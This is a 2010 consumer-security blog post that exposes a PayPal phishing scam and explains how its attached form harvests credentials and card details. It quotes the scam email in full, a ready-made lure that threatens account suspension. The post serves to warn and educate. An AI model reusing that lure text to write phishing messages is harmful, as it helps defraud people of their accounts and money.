Saturday, May 1, 2010

Paypal Phishing Scam Reborn in a New Shape - - Recipient's Paypal Account Error: Reality and Analysis of The Mail

Beware! It's a Cyber World - - Summary:

Email, declaring to be a "new message" from Paypal claims that an error has been detected in the recipient's Paypal account and he or she must submit an attached form verifying his or her details or risk having the account suspended.

Wake up guys! The email is not from Paypal. The claim that there is a problem with the recipient's account is a lie designed to trick him or her into submitting Paypal account details to Internet criminals. Any information entered on the bogus form can be collected by criminals and used to hijack the user's Paypal and credit card accounts.

In November, 2009 same type of phishing scam was reported here on "Beware! Its a Cyber World" titled as:

Paypal Primary Email Address Change Phishing Scam

Cyber criminals emerged with the next episode in the form of current phishing scam. Before going towards the detailed analysis; let's have a look to the mail contents:


Subject: You have a new message from PayPal !

Dear PayPal Customer,

During our regularly scheduled account maintenance and verification procedure we have detected a slight error in your PayPal online account.

This might be due to the following reasons:

1. A recent change in your personal information (ie. change of address, email address)

2. An inability to accurately verify your selected option of payment due to an internal error within our systems.

Please fill in all the details that are required to complete this verification process.

To do this we have attached a form to this email. Please download the form and follow the instructions on your screen. NOTE: The form needs to be opened in a modern browser which has javascript enabled (ex: Internet Explorer 7, Firefox 3, Safari 3, Opera 9)

Please understand that this is a security measure intended to help protect you and your account. We apologize for any inconvenience.

If you choose to ignore our request, you leave us no choice but to temporary suspend your account.

Sincerely, PayPal Account Review Department.

Please do not reply to this e-mail. Mail sent to this address cannot be answered. For assistance, log in to your PayPal account and choose the "Help" link in the footer of any page.


Beware! It's a Cyber World - - Explanation:

This email, which claims to be from popular online payment service PayPal, informs the recipient that an error has been found in his or her PayPal account and the account must therefore be verified to avoid suspension. The message instructs the recipient to fill in and submit a form attached to the email. The form asks for the user's PayPal email address and password along with credit card details and personal identity information.

However, the message is a phishing scam and certainly is not from PayPal. The claim that there is a problem with the recipient 's PayPal account is a lie designed to fool him or her into complying with the fraudulent instructions and submitting personal and financial information. All of the information submitted on the bogus form can be collected by the criminals operating the scam and subsequently used for fraud and identity theft.

Because of its high profile and because it conducts the majority of its business and transactions online, PayPal has become a favourite target of phishing scammers. Criminals constantly use and reuse a great many variations of the above scam in order to trick victims into relinquishing their sensitive personal information. While this version includes the bogus form as an attached file, others may entice the recipient into clicking a link and visiting a fraudulent website designed to resemble the genuine PayPal site. The scammers often use tricks such as address spoofing and disguised links to make their messages seem more legitimate. They may also use PayPal logos and other graphics stolen from the genuine PayPal website to further the illusion that their messages are genuine.

PayPal will never send you an unsolicited email asking you to submit account login details, bank or credit card details or other personal information such as your full name and driver's license numbers. Thus, if you receive an email that asks you to submit such details, then you should treat it with the utmost caution. If you receive such an email, do not open any attachments that may come with the email. Do not click any links in the email. PayPal has published information warning its customers about such phishing scams.

In the past it has been more common for phishing scammers to use direct links to bogus "look-a-like" websites that try to trick victims into submitting information. However, in an increasingly common ploy, the scammers now often include the fraudulent web form as an HTML email attachment. Clicking the attachment opens the bogus form in the user's web browser. The form is coded to ensure that all information entered into the form will be automatically sent to the scammers when the "Submit" button is pressed. Scammers are apparently making more use of email attachments in an attempt to get around the increasingly sophisticated anti-phishing filters now being used by modern web browsers and computer security software.

No comments:

Related Posts Plugin for WordPress, Blogger...